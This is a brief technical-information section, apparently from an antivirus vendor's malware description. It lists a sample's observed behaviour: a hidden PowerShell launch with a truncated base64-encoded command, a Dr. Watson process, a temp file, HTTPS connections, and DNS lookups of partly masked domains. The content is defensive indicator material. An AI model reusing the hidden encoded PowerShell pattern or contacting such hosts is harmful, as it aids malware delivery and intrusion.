Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABKAGIAagBoAHgAcAB5AHkAdwBlAD0AJwBMAHkAZAB6AHcAYgByAG8AcwBoAGQAJwA7ACQAUQBrAGoAZABiAHIAbgBhAHAAIAA9ACAAJwA1ADAAOQAnADsAJABXAGQAZQBlAG8AeAB2AGgAcABmAGMAaABqAD0...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1592
- %TEMP%\898222.cvr
- 'be#####essadvantage.com':443
- 'be#####essadvantage.com':443
- DNS ASK uy###rchem.com
- DNS ASK ba#####dirguruji.com
- DNS ASK th#####sharemall.com
- DNS ASK be#####essadvantage.com
- DNS ASK ke####rookedev.com